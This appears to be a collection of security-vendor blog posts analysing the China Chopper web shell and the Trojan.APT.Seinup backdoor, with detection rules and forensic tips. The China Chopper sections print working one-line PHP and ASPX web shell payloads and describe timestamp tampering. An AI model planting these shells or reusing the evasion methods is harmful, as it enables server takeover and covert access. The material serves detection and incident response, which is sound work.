The Base64-encoded data still contains information including the victim’s hostname and IP address but also a “mark” or “campaign tag/code” that the threat actors use to keep track of their various attacks. The mark for this particular attack was [ll65].
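Pulling a campaign tag like [ll65] out of decoded beacon text can be done with a simple regex. The decoded layout in this sketch is hypothetical; only the bracketed-mark convention comes from the observed sample.

```python
# Sketch: extract a bracketed campaign mark (e.g. [ll65]) from decoded
# beacon text. The field layout here is a made-up illustration.
import re

def extract_mark(decoded: str):
    m = re.search(r"\[([A-Za-z0-9]+)\]", decoded)
    return m.group(1) if m else None

mark = extract_mark("WIN-HOSTNAME|192.0.2.10|[ll65]")
```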


Based on our observations, the most successful threat actors evolve slowly and deliberately. So when they do change, pay close attention.

Knowing how attackers' strategies are shifting is crucial to detecting and defending against today's advanced threats. But knowing the “why” is equally important. That additional degree of understanding can help organizations forecast when and how a threat actor might change their behavior, because if you successfully foil their attacks, they probably will.



[2] This actor is known as APT12 by Mandiant


Breaking Down the China Chopper Web Shell – Part II

Part II in a two-part series. Read Part I.


In Part I of this series, I described China Chopper's easy-to-use interface and advanced features — all the more remarkable considering the Web shell's tiny size: 73 bytes for the aspx version, 4 kilobytes on disk. In this post, I'll explain China Chopper's platform versatility, delivery mechanisms, traffic patterns, and detection. My hope is that armed with this information, you can eradicate this pest from your environment.


So what platform can China Chopper run on? Any Web server that is capable of running JSP, ASP, ASPX, PHP, or CFM. That's the majority of the Web application languages out there. What about operating systems? China Chopper is flexible enough to run transparently on both Windows and Linux. This OS and application flexibility makes this an even more dangerous Web shell.

In Part I of this series, we showed China Chopper executing on a Windows 2003 IIS server using ASPX. Now we will show it running on Linux with PHP. As shown in Figure 1, the contents of the PHP version are just as minimalistic:


Figure 1: This command is all that it takes to run on Linux with PHP.


While the available options differ depending on what platform China Chopper is running on, the file management features in Linux (see Figure 2) are similar to those in Windows.


Figure 2: File browsing on a target system running Linux


The database client example shown in Figure 3 is MySQL instead of MS-SQL, but it offers many of the same capabilities.


Figure 3: Database management from a target system running Linux


The virtual terminal looks familiar (Figure 4), but uses Linux commands instead of Windows because these are ultimately interpreted by the underlying operating system.


Figure 4: Virtual terminal from a target system running Linux


Delivery Mechanism

China Chopper's delivery mechanism can be very flexible due to the size, format, and simplicity of the malware's payload. This small, text-based payload can be delivered using any of the following mechanisms:

  • WebDAV file upload
  • JBoss jmx-console or Apache Tomcat management pages (For more details on this attack vector, read FireEye consultant Tony Lee’s explanation)
  • Remote exploit with a file drop
  • Lateral propagation from other access


Traffic Analysis

We have now seen the server side payload and the client that is used to control the Web shell. Now let's examine China Chopper's traffic. Fortunately, we have both the server and client components, so we can start a packet capture to view the contents of typical traffic. As shown in Figure 5, the client initiates the connection over TCP port 80 using the HTTP POST method.


Figure 5: A packet capture shows that the Web shell traffic is HTTP POST traffic over TCP port 80


Because this is TCP traffic, we can “follow the TCP stream” in Wireshark (a popular open-source network-protocol analyzer that works in Unix and Windows). In Figure 6, the traffic in red at the top is from the attacker (Web client). The traffic shown in blue at the bottom is the response from the target (Web shell).


Figure 6: After following the TCP stream, we can see that the majority of the attacker traffic is Base64 encoded.


As highlighted above, the majority of the attacker traffic appears to be Base64 encoded. This is not a problem, though, because it can be easily decoded. We use the “TextWizard” feature of the free Fiddler Web debugger to discover what the attacker is sending. (Note: %3D is a URL-encoded representation of the equal sign ("="). Fiddler needs this to be converted to an equals sign for proper decoding.)
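The same two-step decode (URL-decode the %3D back to an equals sign, then Base64-decode) can be reproduced in Python. The Base64 string in this sketch is a short stand-in similar to the z2 value seen later; the full attacker payload is not reproduced here.

```python
# Sketch: reproduce the Fiddler TextWizard step — URL-decode first so
# %3D becomes the '=' padding character, then Base64-decode.
import base64
from urllib.parse import unquote

def decode_chopper_param(raw: str) -> str:
    return base64.b64decode(unquote(raw)).decode("utf-8")

decoded = decode_chopper_param("Y2QgL2QgImM6XCI%3D")
```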

Raw attacker traffic:


var err:Exception;try{eval(System.Text.Encoding.GetEncoding(65001).

GetString(System. Convert.FromBase64String










("ERROR:// "%2Berr.message);}Response.Write("|<-");Response.End();&z1=Y21k&z2=Y2QgL2QgImM6



As shown in Figure 9, the Fiddler Web debugger text wizard easily converts the raw traffic from Base64 to plain text.


Figure 9: Fiddler Web debugger decodes the Base64 traffic


Decoded traffic:












Finally we have something more readable. However, our Base64-decoded traffic is now attempting to decode more Base64 traffic that is being stored as z1 and z2. Going back to our attacker traffic, right after the end of the “Password” parameter, we see the z1 and z2 parameters.

I've highlighted Base64-encoded parameters z1 and z2 in the following output:



Base64-decoded parameters z1 and z2:

z1=cmd
z2=cd /d "c:\inetpub\wwwroot\"&whoami&echo [S]&cd&echo [E]


That explains how the client communicates with the shell. The “Password” parameter passes the code to the payload to be executed. The z1 is cmd, and z2 contains the arguments to the command prompt sent via cmd /c. All output is sent to standard output (stdout) back to the attacker, which creates the following response to the whoami command and the present working directory:

->|nt authority\network service[S]C:\Inetpub\wwwroot[E]|<-
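Parsing the shell's framed response shown above is straightforward: the ->| and |<- markers wrap the output, and [S]/[E] bracket the working directory. A minimal sketch:

```python
# Sketch: split a China Chopper response into command output and the
# working directory, based on the ->| ... [S] ... [E] ... |<- framing.
def parse_chopper_response(raw: str):
    body = raw.removeprefix("->|").removesuffix("|<-")
    output, rest = body.split("[S]", 1)
    cwd = rest.split("[E]", 1)[0]
    return output, cwd

out, cwd = parse_chopper_response(
    "->|nt authority\\network service[S]C:\\Inetpub\\wwwroot[E]|<-"
)
```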



Now that we understand the contents of China Chopper and what its traffic looks like, we can focus on ways to detect this pest both at the network and the host level.


With a standard Snort IDS in place, this traffic can be caught with relative ease. Keith Tyler gives a basic IDS signature to work in his early China Chopper blog post:


alert tcp any any -> any 80 (sid:900001; content:"base64_decode"; http_client_body; flow:to_server,established; content:"POST"; nocase; http_method; msg:"Webshell Detected Apache";)


To reduce false positives, we have tightened the Snort IDS signature to focus on China Chopper by looking for contents of “FromBase64String” and “z1” as follows:


alert tcp any any -> any 80 (msg:"China Chopper with first Command Detected"; flow:to_server,established; content:"FromBase64String"; content:"z1"; content:"POST"; nocase; http_method; classtype:web-application-attack; sid:900000101;)


The following IDS signature looks for content of “FromBase64String” and any combination of “z” followed by one to three digits — it would find "z1”, “z10”, or “z100” for example. The idea: if the first command (z1) is missed, you still catch subsequent commands.


alert tcp any any -> any 80 (msg:"China Chopper with all Commands Detected"; flow:to_server,established; content:"FromBase64String"; content:"z"; pcre:"/Z\d{1,3}/i"; content:"POST"; nocase; http_method; classtype:web-application-attack; sid:900000102;)
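The pcre used in the signature above can be checked quickly in Python, where re.IGNORECASE mirrors the /i flag:

```python
# Sketch: the z-parameter pattern from the IDS signature — a 'z'
# followed by one to three digits, case-insensitive.
import re

Z_PARAM = re.compile(r"z\d{1,3}", re.IGNORECASE)

def has_z_param(body: str) -> bool:
    return Z_PARAM.search(body) is not None
```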


Both of these IDS signatures can be modified for further optimization when depth and offset are considered. Be sure to put a valid SID in before implementing and test the signature for performance.

Now that we have discussed detection at the network level, we will see that detection at the host level is also possible. Because the shells must contain a predictable syntax, we can quickly attempt to find files that have that code in play.


Many methods can be used to find files that contain China Chopper. The quickest and easiest method, especially on a Linux machine, is probably using regular expressions. As shown in Figure 10, a quick egrep across your Web directory can help identify infected files.

egrep -re ' [<][?]php\s\@eval[(]\$_POST\[.+\][)];[?][>]' *.php


Figure 10:  Using egrep to find this Web shell


As you can see in Figure 10, egrep and regular expressions are a powerful combination. While the regex may seem like gibberish, it really is not as bad as it seems. Ian Ahl has created a few regex tutorials that can help improve your regex skills. Here are two to get you started:

Windows also provides a way to search files using regular expressions by using the native findstr command.


Figure 11: Using findstr to locate China Chopper


You may have noticed that we had to change up the regex a bit. This was necessary to get around some of the ways that findstr interprets regex. The command you would run is as follows:

findstr /R "[<][?]php.\@eval[(]\$_POST.*[)];[?][>]" *.php


These examples show detection in the PHP shell. To find the ASPX shell, just modify the regex to fit the syntax of the ASPX shell as shown:

egrep -re '[<]\%\@\sPage\sLanguage=.Jscript.\%[>][<]\%eval.Request\.Item.+unsafe' *.aspx

findstr /R "[<]\%\@.Page.Language=.Jscript.\%[>][<]\%eval.Request\.Item.*unsafe" *.aspx
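For hosts where neither egrep nor findstr is convenient, the same checks can be sketched as a small Python scanner. The patterns below mirror the egrep versions above; this is an illustrative sketch, not a complete detection tool.

```python
# Sketch: walk a web directory and flag files whose contents match the
# China Chopper patterns (PHP and ASPX variants, mirroring the egrep regexes).
import os
import re

PATTERNS = {
    ".php": re.compile(r"<\?php\s@eval\(\$_POST\[.+\]\);\?>"),
    ".aspx": re.compile(
        r"<%@\sPage\sLanguage=.Jscript.%><%eval.Request\.Item.+unsafe"
    ),
}

def find_webshells(root: str):
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            pattern = PATTERNS.get(os.path.splitext(name)[1].lower())
            if pattern is None:
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="ignore") as fh:
                    if pattern.search(fh.read()):
                        hits.append(path)
            except OSError:
                continue  # unreadable file; skip
    return hits
```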


If you are not sure where all of the PHP or ASPX files are on a Windows host, you can use the dir command with some extended options to help you identify Web files that you may want to run our regex against (see Figure 12).

dir /S /A /B *.php



Figure 12: Recursive search through Windows using the dir command


Findstr also has an option to search all subdirectories (see Figure 13).

findstr /R /S "[<][?]php.\@eval[(]\$_POST.*[)];[?][>]" *.php



Figure 13: Using findstr to recursively locate multiple instances of the Web shell



I hope this explanation of China Chopper's features, platform versatility, delivery mechanisms, traffic analysis, and detection gives you the knowledge and tools you need to eradicate this elegantly designed but dangerous menace.

Good hunting.

Breaking Down the China Chopper Web Shell – Part I

Part I in a two-part series.

China Chopper: The Little Malware That Could

China Chopper is a slick little web shell that does not get enough exposure and credit for its stealth. Other than a good blog post from security researcher Keith Tyler, we could find little useful information on China Chopper when we ran across it during an incident response engagement. So to contribute something new to the public knowledge base — especially for those who happen to find the China Chopper server-side payload on one of their Web servers — we studied the components, capabilities, payload attributes, and the detection rate of this 4 kilobyte menace.


China Chopper is a fairly simple backdoor in terms of components. It has two key components: the Web shell command-and-control (CnC) client binary and a text-based Web shell payload (server component). The text-based payload is so simple and short that an attacker could type it by hand right on the target server; no file transfer is needed.

Web Shell Client

The Web shell client used to be available on, but we would advise against visiting that site now.

Web shell (CnC) Client MD5 Hash
caidao.exe 5001ef50c7e869253a7c152a638eab8a

The client binary is packed with UPX and is 220,672 bytes in size, as shown in Figure 1.

Client binary viewed in WinHex

Figure 1: Client binary viewed in WinHex

Using the executable file compressor UPX to unpack the binary allows us to see some of the details that were hidden by the packer.

C:\Documents and Settings\Administrator\Desktop>upx -d
5001ef50c7e869253a7c152a638eab8a.exe -o decomp.exe
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2011
UPX 3.08w       Markus Oberhumer, Laszlo Molnar & John Reiser   Dec 12th 2011
File size         Ratio      Format      Name
--------------------   ------   -----------   -----------
700416 <-    220672   31.51%    win32/pe     decomp.exe
Unpacked 1 file.

Using PEiD (a free tool for detecting packers, cryptors and compilers found in PE executable files), we see that the unpacked client binary was written in Microsoft Visual C++ 6.0, as shown in Figure 2.


Figure 2: PEiD reveals that the binary was written using Visual C++ 6.0

Because the strings are not encoded, examining the printable strings in the unpacked binary provides insight into how the backdoor communicates. We were intrigued to see a reference to using the Chinese (simplified) language parameter (Figure 3) as well as references to the text “Chopper" (Figure 4).


Figure 3: Printable strings refer to the Chinese (simplified) language parameter


Figure 4: References to Chopper in the client binary

So we have highlighted some attributes of the client binary. But what does it look like in use? China Chopper is a menu-driven GUI full of convenient attack and victim-management features. Upon opening the client, you see example shell entries that point to the site that originally hosted components of the Web shell.

To add your own target, right click within the client, select “Add” and enter the target IP address, password, and encoding as shown in Figure 5.


Figure 5: Picture of the China Chopper Web shell client binary

Server-side Payload Component

But the client is only half of the remote access tool — and not likely the part you would find on your network. Its communication relies on a payload in the form of a small Web application. This payload is available in a variety of languages such as ASP, ASPX, PHP, JSP, and CFM. Some of the original files that were available for download are shown with their MD5 hashes:

Web shell payload   MD5 hash
Customize.aspx      8aa603ee2454da64f4c70f24cc0b5e08
Customize.cfm       ad8288227240477a95fb023551773c84
Customize.jsp       acba8115d027529763ea5c7ed6621499


Even though the MD5s are useful, keep in mind that this is a text-based payload that can be easily changed, resulting in a new MD5 hash. We will discuss the payload attributes later, but here is an example of just one of the text-based payloads:


 <%@ Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%>

Note that “password” would be replaced with the actual password to be used in the client component when connecting to the Web shell.
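Since the one-liner simply evaluates whatever code arrives in the POST parameter named after the shell password, the client side of the exchange boils down to a form-encoded POST. A rough illustration (the parameter value here is hypothetical; the real client builds more elaborate requests):

```python
from urllib.parse import urlencode

def build_shell_request(password_param: str, server_code: str) -> bytes:
    """Form-encoded POST body: the payload eval()s whatever arrives in the
    parameter whose name matches the shell 'password'."""
    return urlencode({password_param: server_code}).encode()

# Hypothetical example: ask the ASPX payload to echo a marker string.
body = build_shell_request("password", 'Response.Write("alive");')
```

This is why the shell's "password" is really just a parameter name: knowledge of it is all that gates code execution.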

In the next post, we provide regular expressions that can be used to find instances of this Web shell.


The capabilities of both the payload and the client are impressive considering their size.  The Web shell client contains a “Security Scan” feature, independent of the payload, which gives the attacker the ability to spider and use brute force password guessing against authentication portals.


Figure 6: China Chopper provides a “Security Scan” feature

In addition to vulnerability hunting, this Web shell has excellent CnC features when the client and payload are combined, including the following:

  • File Management (File explorer)
  • Database Management (DB client)
  • Virtual Terminal (Command shell)

In China Chopper's main window, right-clicking one of the target URLs brings up a list of possible actions (see Figure 7).


Figure 7: Screenshot of the CnC client showing capabilities of the Web shell

File Management

Used as a remote access tool (RAT), China Chopper makes file management simple.  Abilities include uploading and downloading files to and from the victim, using the file-retrieval tool wget to download files from the Web to the target, editing, deleting, copying, renaming, and even changing the timestamp of the files.


Figure 8: File Management provides an easy to use menu that is activated by right-clicking on a file name

So just how stealthy is the “Modify the file time” option? Figure 9 shows the timestamps of the three files in the test directory before the Web shell modifies the timestamps. By default, Windows Explorer shows only the “Date Modified” field. So normally, our Web shell easily stands out because it is newer than the other two files.


Figure 9: IIS directory showing time stamps prior to the time modification

Figure 10 shows the date of the file after the Web shell modifies the timestamp. The modified time on our Web shell shows up as the same as the other two files. Because this is the default field displayed to users, it easily blends in to the untrained eye — especially with many files in the directory.


Figure 10: IIS directory showing time stamps after the time modification

Clever investigators may think that they can spot the suspicious file due to the creation date being changed to the same date as the modified date. But this is not necessarily anomalous. Additionally, even if the file is detected, the forensic timeline would be skewed because the date that the attacker planted the file is no longer present. To find the real date the file was planted, you need to go to the Master File Table (MFT). After acquiring the MFT using FTK, EnCase, or other means, we recommend using mftdump. Written by FireEye researcher Mike Spohn, mftdump is a great tool for extracting and analyzing file metadata.

The following table shows the timestamps pulled from the MFT for our Web shell file. We pulled the timestamps before and after the timestamps were modified. Notice that the “fn*” fields retain their original times, thus all is not lost for the investigator!

Category              Pre-touch match    Post-touch match
siCreateTime (UTC)    6/6/2013 16:01     2/21/2003 22:48
siAccessTime (UTC)    6/20/2013 1:41     6/25/2013 18:56
siModTime (UTC)       6/7/2013 0:33      2/21/2003 22:48
siMFTModTime (UTC)    6/20/2013 1:54     6/25/2013 18:56
fnCreateTime (UTC)    6/6/2013 16:01     6/6/2013 16:01
fnAccessTime (UTC)    6/6/2013 16:03     6/6/2013 16:03
fnModTime (UTC)       6/4/2013 15:42     6/4/2013 15:42
fnMFTModTime (UTC)    6/6/2013 16:04     6/6/2013 16:04
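The si/fn discrepancy above suggests a simple triage check once the MFT timestamps have been parsed. A minimal sketch, assuming the records have already been parsed into dictionaries whose field names mirror the mftdump columns above (the sample values are the post-touch entries from the table):

```python
from datetime import datetime

def looks_timestomped(rec: dict, tolerance_s: float = 2.0) -> bool:
    """Flag a file whose $STANDARD_INFORMATION creation time diverges from its
    $FILE_NAME creation time: common timestomping tools rewrite the si* fields
    but leave the fn* fields intact."""
    delta = abs((rec["siCreateTime"] - rec["fnCreateTime"]).total_seconds())
    return delta > tolerance_s

# Post-touch values from the table above: siCreateTime was backdated to 2003,
# but fnCreateTime still records the real planting date in 2013.
stomped = {
    "siCreateTime": datetime(2003, 2, 21, 22, 48),
    "fnCreateTime": datetime(2013, 6, 6, 16, 1),
}
```

Note this check is heuristic: an attacker with raw disk access can rewrite the fn* fields too, so a match does not prove innocence.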

Database Management

The Database Management functionality is impressive and helpful to the first-time user.  Upon configuring the client, China Chopper provides example connection syntax.


Figure 11: Database Management requires simple configuration parameters to connect

After connecting, China Chopper also provides helpful SQL commands that you may want to run.


Figure 12: Database Management provides the ability to interact with a database and even provides helpful prepopulated commands

Command Shell Access

Finally, command shell access is provided for that OS level interaction you crave. What a versatile little Web shell!


Figure 13: Virtual Terminal provides a command shell for OS interaction

Payload Attributes

We stated above that this backdoor is stealthy due to a number of factors including the following:

  • Size
  • Server-side content
  • Client-side content
  • AV detection rate


Size

Legitimate and illegitimate software usually follow the same principle: more features means more code, which means larger size. Considering how many features this Web shell contains, it is incredibly small — just 73 bytes for the aspx version, or 4 kilobytes on disk (see Figure 14). Compare that to other Web shells such as Laudanum (619 bytes) or RedTeam Pentesting (8,527 bytes). China Chopper is so small and simple that you could conceivably type the contents of the shell by hand.


Figure 14: China Chopper file properties

Server-Side Content

The server-side content could easily be overlooked among the other files associated with a vanilla install of a complex application. The code does not look too evil in nature, but it is curious.


Figure 15: The content of the file seems relatively benign, especially if you add a warm and fuzzy word like Security as the shell password

Below are the contents of the Web shell for two of its varieties.




 <%@ Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%>






 <?php @eval($_POST['password']);?>



Client-Side Content

Because all of the code is server-side language that does not generate any client-side code, browsing to the Web shell and viewing the source as a client reveals nothing.


Figure 16: Viewing the source of the web shell reveals nothing to the client

Anti-virus Detection Rate

Running the Web shell through the virus-scanning website No Virus Thanks shows a detection rate of 0 out of 14, indicating that most, if not all, anti-virus tools would miss the Web shell on an infected system.


Figure 17: Results of multiple anti-virus engine inspections showing China Chopper coming up clean

The same holds true for VirusTotal. None of its 47 anti-virus engines flags China Chopper as malicious.


Figure 18: Results of multiple AV engine inspections showing the Web shell comes up clean


We hope that this post has advanced the understanding of this compact, flexible, and stealthy Web shell. If you are reading this, you may be facing China Chopper right now — if so, we wish you success in eradicating this pest. In Part II, we examine the platform China Chopper runs on and describe its delivery mechanisms, traffic analysis and detection.

Trojan.APT.Seinup Hitting ASEAN

1. Executive Summary

The FireEye research team has recently identified a number of spear phishing activities targeting Asia and ASEAN. One of the spear phishing documents was suspected to have used a potentially stolen document as a decoy. The rich and contextual details (body and metadata), which are not available online, lead us to believe it was stolen. This decoy document mentions countries such as Brunei, Cambodia, Indonesia, Laos, Malaysia, Myanmar, the Philippines, Singapore, Thailand, and Vietnam, which leads us to suspect that these countries are the targets. As the content of this decoy document is suspected to be a stolen sensitive document, the details will not be published.

This malware was found to have used a number of advanced techniques, which makes it interesting:

  1. The malware leverages Google Docs to perform redirection to evade callback detection. This technique was also found in the malware dubbed “Backdoor.Makadocs” reported by Takashi Katsuki (Katsuki, 2012).
  2. It is heavily equipped with a variety of cryptographic functions to perform some of its functions securely.
  3. The malicious DLL is manually loaded into memory which hides from DLL listing.

As depicted in the diagram below, the spear phishing document (which exploits CVE-2012-0158) creates a decoy document and a malware dropper named exp1ore.exe. This dropper then drops wab.exe (the Address Book Application) and wab32res.dll (a malicious DLL) inside the temp folder. When wab.exe runs, the malicious DLL named wab32res.dll (located in the same folder) is loaded using the DLL side-loading technique. This in turn installs a copy of wab32res.dll as msnetrsvw.exe inside the Windows directory, registered as a Windows service. Registering as a Windows service allows the malware to survive every reboot and persist on the network.


Figure 1 Infection Flow

This malware is named “Trojan.APT.Seinup” because one of its export functions is named “seinup”. The malware was analysed to be a backdoor that allows the attacker to remotely control the infected system.


Figure 2 Exported Functions

2. Related APT Domain and MD5

Based on our threat intelligence and reverse-engineering efforts, below are some related domains and MD5 sums. Please note that some of the domain/IP associations may change.

2.1. Related Domain


2.2. Associated Files

Name            MD5                               Comments
Spear-phishing document and decoy document   CONFIDENTIAL   CONFIDENTIAL
iexp1ore.exe    137F3D11559E9D986D510AF34CB61FBC  Dropper
wab.exe         CE67AAA163A4915BA408B2C1D5CCC7CC  Benign Address Book Application
wab32res.dll    FB2FA42F052D0A86CBDCE03F5C46DD4D  Malware to be side-loaded when wab.exe is launched.
msnetrsvw.exe   FB2FA42F052D0A86CBDCE03F5C46DD4D  Malware to be installed as a service. Note: This is the same as wab32res.dll.
                baf227a9f0b21e710c65d01f2ab01244  Calls to
                0845f03d669e24144df785ee54f6ad74  Calls to
                d64a22ea3accc712aebaa047ab818b07  Calls to
                56e6c27f9952e79d57d0b32d16c26811  Calls to
                cdd969121a2e755ef3dc1a7bf7f18b24  Calls to
                709c71c128a876b73d034cde5e3ec1d3  Calls to

3. Interesting Technical Observations

3.1. Redirection Using Google Docs

By connecting to the malicious server via Google Docs, the malicious communication is protected by the legitimate SSL provided by Google Docs (see Figure below). One possible way to examine the SSL traffic is to make use of a hardware SSL decrypter within an organisation. Alternatively, you may want to examine the usage pattern of the users. If a particular user accesses Google Docs multiple times a day, the organisation's Incident Response team may want to dig deeper to find out whether the traffic is triggered by a human or by malware.

Retrieve Command

Figure 3 Retrieve Command via Google Docs

Below is the code that is used to construct a URL that retrieves commands via Google Docs. First, the malicious URL is constructed and then encoded. Next, the malware simply leverages the Google Docs viewer to retrieve the command from the malicious server (see Figure below).

Figure 4 View Command via GoogleDocs

3.2. Zero-Skipping XOR Encryption

The shellcode encryption technique is fairly standard. The shellcode has a decryption stub that decrypts its body using the XOR key 0x9E; this shellcode is used to extract exp1ore.exe (malware) and Wor.doc (benign document).

The exp1ore.exe and Wor.doc were found within the spear phishing document, encrypted using the same technique with the key 0xFC. The XOR key is applied only to non-zero bytes (see Figure 5), which defeats the common statistical method of recovering the XOR key from long runs of encrypted zero bytes. The encrypted executable file and benign document were identified at offsets 0x2509 and 0x43509 respectively inside the spear phishing document.


Figure 5 Zero Skipping XOR Encryption
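The scheme as described can be modeled in a few lines. A minimal sketch, covering only the zero-skipping behavior (the real stub may also skip bytes equal to the key so that encryption never produces new zeros):

```python
def zero_skipping_xor(data: bytes, key: int) -> bytes:
    """XOR every byte with a single-byte key, leaving 0x00 bytes untouched.
    The operation is its own inverse, so the same function decrypts."""
    return bytes(b if b == 0 else b ^ key for b in data)
```

Because encrypted zeros remain zeros, the long zero runs in a PE file no longer leak the key the way they do under plain single-byte XOR.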

Even though statistical methods may not be useful in identifying the XOR key as the zero bytes are not encrypted, we could use some of the “known” strings below to hunt for the XOR key in this situation. By sliding the known string across the array of bytes to perform a windowed XOR, the key would be revealed when the encoded data is XORed with the known string.

  • “This program cannot be run in DOS mode”
  • “KERNEL32.dll”
  • “LoadLibraryA”
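The sliding known-plaintext approach described above can be sketched as follows (a simple illustration, not the exact tooling we used):

```python
def hunt_xor_key(blob: bytes, known: bytes):
    """Slide a known plaintext across the blob. Wherever the window XORed
    against the known string collapses to a single byte value, that value is
    a single-byte key candidate (zero bytes are skipped, matching the
    zero-skipping scheme)."""
    for off in range(len(blob) - len(known) + 1):
        window = blob[off:off + len(known)]
        keys = {c ^ p for c, p in zip(window, known) if c and p}
        if len(keys) == 1:
            yield off, keys.pop()
```

Running this with one of the known strings above against the spear phishing document would reveal the key at the offset of the embedded executable.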

3.3. Deployment of Various Cryptographic Functions

3.3.1. Secure Callback

The malware performs the callback in a secure manner. It uses a custom Base64 map to encode its data, and creates a salted digital thumbprint to allow validation of data.

Below describes the steps to validate a callback using an example of the following URL:

hxxp:// 5P &wDq= 6QeZky42OCQOLQuZ6dC2LQ7F56iAv6GpH6S+w8npH5oAZk== &k4fJdSp7= cc3237bc79192a096440faca0fdae10 &GvQF2lotIr5bT2= 349118df672db38f9e65659874b60b27

The URL could be generalised as follows:

Domain/<PHP>?<rand 11-13 char>= <A'>&<rand 3-5 char>= <B'>&<rand 7-9 char>= <C'>&<rand 14-16 chars>= <D'>

The definition of A’, B’, C’ and D’ are as follows:

Let H be the function which encodes bytes as hexadecimal characters prepended with “%” if they are not alphanumeric, dash, underscore, or dot (i.e., URL encoding).

Let B64 be the Base64 encoder using the following custom map: "URPBnCF1GuJwH2vbkLN6OQ/5S9TVxXKZaMc8defgiWjmo7pqrAstyz0D+El3I4hY".

Let PT be the plain text, which is in the form "<HostName>[<RunType>]:<IPAddress>{1}", where HostName and IPAddress are strings and RunType is a character.

Let A be a random string of 3 to 7 characters, and A' = H(A)

Let B be B64(PT), and B' = H(B)

Let C be a 32-character delimiter, and C' = H(C)

Let D be H( MD5( salt + MD5( B64(PT) + A + C ) ) ), where salt = "%^^*HFH)*$FJK)234sd2N@C(JGl2z94cg23", and D' = H(D)

Hence, in this case, the specific malicious URL could be applied as follows:

Domain/<PHP>  =

A’ = “5Pb”

B’ = “6QeZky42OCQOLQuZ6dC2LQ7F56iAv6GpH6S%2Bw8npH5oAZk==”

C’ = “cc3237bc79192a096440faca0fdae107”

D’ = “349118df672db38f9e65659874b60b27” (This is the digital signature)

The hash could be verified as follows:

B64(PT) + A + C = “6QeZky42OCQOLQuZ6dC2LQ7F56iAv6GpH6S+w8npH5oAZk==” +  “5Pb” + “cc3237bc79192a096440faca0fdae107”

MD5 (B64(PT) + A + C) = “766cf9e96c1a508c59f7ade1c50ecd28”

MD5 (salt + MD5(B64(PT) + A + C))   = MD5 ( “%^^*HFH)*$FJK)234sd2N@C(JGl2z94cg23” + “766cf9e96c1a508c59f7ade1c50ecd28”)

= 349118df672db38f9e65659874b60b27 (This equals D’, so the signature is verified)

The encoded plain text (B) could be recovered:

B64(PT) = “6QeZky42OCQOLQuZ6dC2LQ7F56iAv6GpH6S+w8npH5oAZk==”;

PT = “MY_COMPUTER_NAME[F]:{1}”, where “MY_COMPUTER_NAME” is the hostname, ‘F’ is the run type, “” is the IP address.

Note: This example is mocked up using a dummy computer name and IP address.

Python code along the lines of the figure below could be used to decode the custom encoded string.


Figure 6 Python to Decode a Custom Base 64
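A decoder for this custom alphabet simply translates the custom map onto the standard Base64 alphabet before decoding. A minimal sketch (the encoder is the same translation in reverse):

```python
import base64

# Custom Base64 alphabet recovered from the sample (see the B64 definition above).
CUSTOM = "URPBnCF1GuJwH2vbkLN6OQ/5S9TVxXKZaMc8defgiWjmo7pqrAstyz0D+El3I4hY"
STANDARD = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

def custom_b64decode(text: str) -> bytes:
    """Map the custom alphabet back to the standard one, then decode normally
    ('=' padding is unaffected by the translation)."""
    return base64.b64decode(text.translate(str.maketrans(CUSTOM, STANDARD)))

def custom_b64encode(raw: bytes) -> str:
    return base64.b64encode(raw).decode().translate(str.maketrans(STANDARD, CUSTOM))
```

Applying custom_b64decode to the B' value from a callback URL (after reversing the H percent-encoding) recovers the "<HostName>[<RunType>]:<IPAddress>{1}" plain text.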

3.3.2. Random Generator Using Mersenne Twister Algorithm

The malware was found to perform callbacks at random intervals so as to evade network investigations that look for connections occurring at a regular interval. Additionally, even the names of the parameters in the GET string have a random length and name, which makes it hard to create a fixed signature to detect such callbacks (see 3.3.1 to understand how a callback is created).


Figure 7 Mersenne Twister Algorithm Seeding function
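To illustrate why fixed-interval detection fails, a beacon scheduler with Mersenne Twister jitter can be sketched in a few lines. The base and jitter values here are hypothetical, not recovered from the sample; conveniently, CPython's random module is itself an MT19937 (Mersenne Twister) generator:

```python
import random  # CPython's random module implements MT19937 (Mersenne Twister)

def next_callback_delay(rng: random.Random, base: float = 300.0, jitter: float = 0.5) -> float:
    """Return a sleep time of base seconds +/- up to jitter*base, so that
    consecutive callbacks never land on a signature-friendly fixed interval."""
    return base * (1.0 + rng.uniform(-jitter, jitter))
```

A detector keyed on "connection every N seconds" sees only an irregular trickle; frequency analysis over long windows is needed instead.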

3.4. In-Memory-Only Malicious Code

On disk, the malicious code is either encrypted or compressed to evade signature-based scanning. Only upon being loaded into memory is the malicious code (which appears to be in the form of a DLL) manually mapped, without the use of the Win32 API. In this way, the malicious DLL does not appear in DLL listings when an investigation is performed, and analysis becomes much harder.


Figure 8 Segments in the memory which contains the malicious code

Taking a deeper look at the decrypted malicious code, this malware was found to contain at least the following functions:

  • Download file
  • Download and execute or load library
  • Change sleep duration
  • Open and close interactive sessions

4. Conclusion

Malware is becoming increasingly contextually advanced, attempting to appear as much as possible like legitimate software or documents. From this example, we conclude the following.

  1. A potentially stolen document was used as a decoy to increase credibility. It is also a sign that compromised organisations could be used as soft targets to compromise their business partners and allies.
  2. It is important to put a stop to the malware infection at the very beginning, which is the exploitation phase. Once a network is compromised, it is increasingly harder to detect such threats.
  3. Anti-incident-response and anti-forensic techniques are increasingly used to evade detection. It requires a keen eye for detail and a wealth of experience to identify all these advanced techniques.

5. Works Cited

Carnegie Mellon University. (n.d.). Retrieved from

Katsuki, T. (19 Nov, 2012). Malware Targeting Windows 8 Uses Google Docs. Retrieved from

I would like to thank several colleagues for their significant contributions on this post: Darien Kindlund, Ned Moran, Nart Villeneuve, and Thoufique Haq.



Get Set Null Java Security

Java, being widely used by applications, has also been actively targeted by malware authors. One of the most common techniques used to exploit Java applications is to disable the security manager. This post describes the logic widely used by malware authors to disable the security manager.

Per the Java tutorial:

‘A security manager is an object that defines a security policy for an application. This policy specifies actions that are unsafe or sensitive. Any actions not allowed by the security policy cause a SecurityException to be thrown. An application can also query its security manager to discover which actions are allowed.’

Once an application has a reference to the security manager object, it can request permission to do specific things. For example, System.exit, which terminates the Java virtual machine with an exit status, invokes SecurityManager.checkExit to ensure that the current thread has permission to shut down the application.

